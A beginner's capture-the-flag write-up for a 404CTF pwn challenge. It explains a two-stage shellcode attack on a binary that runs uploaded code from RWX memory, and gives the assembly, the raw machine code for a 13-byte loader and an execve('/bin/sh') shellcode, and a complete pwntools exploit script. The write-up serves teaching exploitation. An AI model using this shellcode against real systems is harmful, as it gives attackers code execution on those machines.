TL;DR
RWX memory + 13-byte size limit = staged shellcode time! Upload a tiny loader (13 bytes) that reads a bigger shellcode (24 bytes), then execute it to get a shell.
Challenge Files: chall (ELF binary)
Note: This is one of my first CTF writeups! At the time I solved this challenge, I was just starting out with pwn. There are probably cleaner/simpler ways to solve this, but this approach worked for me. If you spot improvements, feel free to share!
Challenge Overview
We’re given a “Firmware Updater v1.0” for a “space core”.
The program has 3 options:
1. Upload an update <- Our entry point
2. Run the firmware <- Executes our code
3. Open a bidirectional connection <- Just exits
Binary Protections
Let’s check what we’re dealing with:
$ checksec chall
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
What this means:
- NX enabled - The stack isn’t executable (doesn’t matter, we have an RWX mmap!)
- PIE enabled - Addresses are randomized (also doesn’t matter for us)
- No canary - No stack-smashing detection
- Partial RELRO - The GOT is writable
But here’s the thing: none of this matters because the program literally gives us RWX memory and executes whatever we send! The protections are meaningless when there’s a deliberate code execution feature.
Source Code Analysis
Let’s look at the juicy parts:
long firmware_max_size = 0xd; // Only 13 bytes!
void *firmware;
// Allocate RWX memory - the good stuff
firmware = mmap(NULL, 0x1000,
                PROT_READ | PROT_WRITE | PROT_EXEC,
                MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
The program allocates 4KB (0x1000 bytes) with RWX permissions - read, write, AND execute. That’s shellcode heaven! But there’s a catch…
void upload_update(long firmware_max_size, void* firmware) {
    printf("Ready to receive update > ");
    bytes_read = read(0, firmware, firmware_max_size);
}
void apply_update(void* firmware) {
    ((void (*)())firmware)(); // Cast and execute!
}
The problem: We can only upload 13 bytes (0xd), but a typical execve("/bin/sh") shellcode is in the 20-30 byte range (the one used below is 24 bytes). Houston, we have a problem!
The Solution: Staged Shellcode
Since we can’t fit everything in 13 bytes, we’ll use a two-stage approach:
- Stage 1 (13 bytes): A tiny loader that reads more data
- Stage 2 (24 bytes): The actual execve shellcode
Think of it like a rocket: Stage 1 gets us into orbit, Stage 2 takes us to the moon!
Stage 1: The Loader (13 bytes)
This shellcode reads additional bytes from stdin and stores them right after itself:
lea rsi, [rdi+0xd] ; Calculate where to write (firmware + 13)
xor edi, edi ; fd = 0 (stdin)
xor eax, eax ; syscall number 0 (read)
push 0x18 ; Length to read (24 bytes)
pop rdx ; rdx = 24 (size)
syscall ; Call read(0, firmware+13, 24)
Machine code: \x48\x8d\x77\x0d\x31\xff\x31\xc0\x6a\x18\x5a\x0f\x05
How it works:
- When apply_update() is called, rdi contains the firmware address (function argument)
- lea rsi, [rdi+0xd] calculates the address right after our 13-byte shellcode
- We set up registers for the read(0, firmware+13, 24) syscall
- After the syscall, execution continues right into Stage 2!
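The byte budget of the loader can be double-checked offline. The following is a minimal sketch using only the encodings from the listing above; the names STAGE1_PARTS, FIRMWARE_MAX_SIZE and stage1_budget are made up for this illustration and do not come from the challenge.

```python
# Stage 1 split per instruction, using the encodings from the listing above.
STAGE1_PARTS = [
    (b"\x48\x8d\x77\x0d", "lea rsi, [rdi+0xd]"),
    (b"\x31\xff", "xor edi, edi"),
    (b"\x31\xc0", "xor eax, eax"),
    (b"\x6a\x18", "push 0x18"),
    (b"\x5a", "pop rdx"),
    (b"\x0f\x05", "syscall"),
]

FIRMWARE_MAX_SIZE = 0xD  # upload limit taken from the challenge source


def stage1_budget(parts, limit):
    """Return (total_size, bytes_left) for a list of (encoding, mnemonic) pairs."""
    total = sum(len(encoding) for encoding, _ in parts)
    return total, limit - total


total, left = stage1_budget(STAGE1_PARTS, FIRMWARE_MAX_SIZE)
stage1 = b"".join(encoding for encoding, _ in STAGE1_PARTS)

# The displacement byte of the lea must equal the loader's own length,
# otherwise Stage 2 would not start where execution resumes after the syscall.
lea_displacement = STAGE1_PARTS[0][0][3]

print(f"stage 1: {total} bytes, {left} bytes to spare")
print(f"lea displacement: {lea_displacement:#x}")
```

The loader uses the full 13 bytes, so any change to it (for example a longer read length that needs a 4-byte immediate) has to be paid for somewhere else.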
Stage 2: The Shell (24 bytes)
This is a classic execve("/bin/sh") shellcode:
xor rsi, rsi ; rsi = NULL (argv)
push rsi ; Push NULL (string terminator)
mov rdi, 0x68732f6e69622f2f ; Load "//bin/sh" (little-endian)
push rdi ; Push "//bin/sh" onto stack
push rsp ; Push address of string
pop rdi ; rdi = address of "//bin/sh"
xor rdx, rdx ; rdx = NULL (envp)
mov al, 0x3b ; syscall 59 (execve); rax still holds read()'s return value (24), so only the low byte needs setting
syscall ; Call execve("//bin/sh", NULL, NULL)
Machine code: \x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05
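To convince yourself that the immediate in the mov really is the path string, the little-endian packing can be reproduced with the standard library. This is a small sketch, not part of the original exploit; the variable names are chosen for illustration.

```python
import struct

# Immediate operand of "mov rdi, 0x68732f6e69622f2f" from the listing above.
imm = 0x68732F6E69622F2F

# x86-64 stores immediates little-endian, so the lowest byte comes first in memory.
path = struct.pack("<Q", imm)

stage2 = (
    b"\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
    b"\x57\x54\x5f\x48\x31\xd2\xb0\x3b\x0f\x05"
)

# Bytes 6..13 of Stage 2 are the 8-byte immediate that follows the 48 bf opcode.
embedded = stage2[6:14]

print(path)         # the string that ends up on the stack
print(len(stage2))  # must match the 0x18 length requested by Stage 1
```

The length check matters because Stage 1 asks read() for exactly 0x18 bytes; if Stage 2 grows, the push 0x18 in the loader has to change with it.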
Exploitation Flow
Here’s how the magic happens:
┌──────────────┐
│ 1. Upload    │  Send Stage 1 (13 bytes)
│    Update    │
└───────┬──────┘
        │
        ▼
┌──────────────┐
│ 2. Run       │  Execute Stage 1
│    Firmware  │
└───────┬──────┘
        │
        ▼
┌──────────────┐
│ Stage 1      │  Calls read() to get more data
│ executing... │  Reads 24 more bytes
└───────┬──────┘
        │
        ▼
┌──────────────┐
│ Send Stage 2 │  Our execve shellcode
│  (24 bytes)  │
└───────┬──────┘
        │
        ▼
┌──────────────┐
│ Stage 2      │  Spawns /bin/sh
│ executing... │
└───────┬──────┘
        │
        ▼
     SHELL!
Memory Layout
Before exploitation:
┌─────────────────────────────────────┐
│ firmware address (0x1000 bytes)     │
│ Permissions: RWX                    │
│ Empty...                            │
└─────────────────────────────────────┘
After uploading Stage 1:
┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                  │
├─────────────────────────────────────┤
│ Empty...                            │
└─────────────────────────────────────┘
After Stage 1 executes:
┌─────────────────────────────────────┐
│ Stage 1 (13 bytes)                  │
├─────────────────────────────────────┤
│ Stage 2 (24 bytes) ← Just loaded!   │
├─────────────────────────────────────┤
│ Empty...                            │
└─────────────────────────────────────┘
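The same layout can be modelled with a plain bytearray standing in for the mmap'd page. This is only a simulation under the assumption that both read() calls deliver all requested bytes; nothing here is executed as machine code, and the variable names are illustrative.

```python
PAGE_SIZE = 0x1000

# Anonymous mmap memory starts zero-filled, so a zeroed bytearray models it.
page = bytearray(PAGE_SIZE)

stage1 = bytes.fromhex("488d770d31ff31c06a185a0f05")
stage2 = bytes.fromhex("4831f65648bf2f2f62696e2f736857545f4831d2b03b0f05")

# upload_update(): read(0, firmware, 13) writes Stage 1 at offset 0.
page[0:len(stage1)] = stage1

# Stage 1: read(0, firmware + 13, 24) writes Stage 2 directly behind the loader.
resume_offset = len(stage1)  # where execution continues after Stage 1's syscall
page[resume_offset:resume_offset + len(stage2)] = stage2

used = len(stage1) + len(stage2)
print(f"resume offset: {resume_offset}, bytes used: {used} of {PAGE_SIZE}")
```

Since the syscall instruction is the last two bytes of Stage 1, the instruction pointer lands on offset 13 right after read() returns, which is exactly where Stage 2 was written.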
Exploit Script
from pwn import *
# Connect to target
io = remote('challenges.404ctf.fr', PORT)  # PORT: placeholder, use the port shown on the challenge page
# or for local: io = process('./chall')
# Stage 1: Tiny loader (13 bytes)
stage1 = b"\x48\x8d\x77\x0d" # lea rsi, [rdi+0xd]
stage1 += b"\x31\xff" # xor edi, edi
stage1 += b"\x31\xc0" # xor eax, eax
stage1 += b"\x6a\x18" # push 0x18
stage1 += b"\x5a" # pop rdx
stage1 += b"\x0f\x05" # syscall
log.info(f"Stage 1 size: {len(stage1)} bytes")
# Stage 2: execve("/bin/sh") (24 bytes)
stage2 = b"\x48\x31\xf6" # xor rsi, rsi
stage2 += b"\x56" # push rsi
stage2 += b"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov rdi, "//bin/sh"
stage2 += b"\x57" # push rdi
stage2 += b"\x54" # push rsp
stage2 += b"\x5f" # pop rdi
stage2 += b"\x48\x31\xd2" # xor rdx, rdx
stage2 += b"\xb0\x3b" # mov al, 0x3b
stage2 += b"\x0f\x05" # syscall
log.info(f"Stage 2 size: {len(stage2)} bytes")
# Step 1: Upload Stage 1
io.sendlineafter(b'> ', b'1')
io.sendafter(b'> ', stage1)
# Step 2: Execute firmware (Stage 1 runs and waits for input)
io.sendlineafter(b'> ', b'2')
# Step 3: Stage 1 is now waiting on read() - send Stage 2!
io.send(stage2)
# Get shell!
io.interactive()
Key Technical Points
1. The ModR/M Byte Matters!
A common mistake: writing lea rsp, [rdi+0xd] instead of lea rsi, [rdi+0xd]. The two encodings differ only in the ModR/M byte (0x67 for rsp, 0x77 for rsi), but the first one corrupts the stack pointer instead of setting up our destination address. Always double-check your assembly!
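To see how one byte decides between rsi and rsp, here is a minimal sketch of a ModR/M decoder. It is deliberately simplified: it ignores the REX.R/REX.B extension bits and the SIB special case, neither of which applies to this instruction, and decode_modrm is a helper invented for this example.

```python
# Register numbering used by the 3-bit reg and r/m fields (without REX extension).
REG64 = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]


def decode_modrm(byte):
    """Split a ModR/M byte into (mod, destination register, base register)."""
    mod = byte >> 6             # 0b01 means "base register + 8-bit displacement"
    reg = (byte >> 3) & 0b111   # destination operand of lea
    rm = byte & 0b111           # base register of the memory operand
    return mod, REG64[reg], REG64[rm]


good = decode_modrm(0x77)  # from 48 8d 77 0d
bad = decode_modrm(0x67)   # from 48 8d 67 0d

print(good)
print(bad)
```

Only the reg field differs (0b110 versus 0b100), so a single flipped bit turns the destination from rsi into rsp.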
2. Why Staged Shellcode?
Staging is super common in real exploits:
- The initial injection point is often tiny (buffer size restrictions)
- Frameworks like Metasploit ship staged payloads for exactly this reason
- It allows complex payloads despite space constraints
3. Direct Syscalls
We use raw syscalls instead of libc functions for:
- Smaller code size
- Independence from whichever libc version the target runs
- No dependency on libc addresses (which ASLR randomizes)
4. The “/bin/sh” String
We use //bin/sh (8 bytes) instead of /bin/sh (7 bytes) because it fills a 64-bit register exactly, so a single mov plus push puts the whole string on the stack. The extra / doesn’t hurt: Linux resolves //bin/sh to the same file as /bin/sh.
Lessons Learned
Exploitation techniques:
- Staged payloads - When space is limited, load a small loader first
- RWX memory abuse - If you can write and execute, game over
- Register conventions - Understanding calling conventions (rdi = first arg)
- Shellcode optimization - Every byte counts when space is tight
- Stack manipulation - Building strings on the stack for execve
Flag
404CTF{wh3n_l1fe_91ve5_you_LeMOn...}
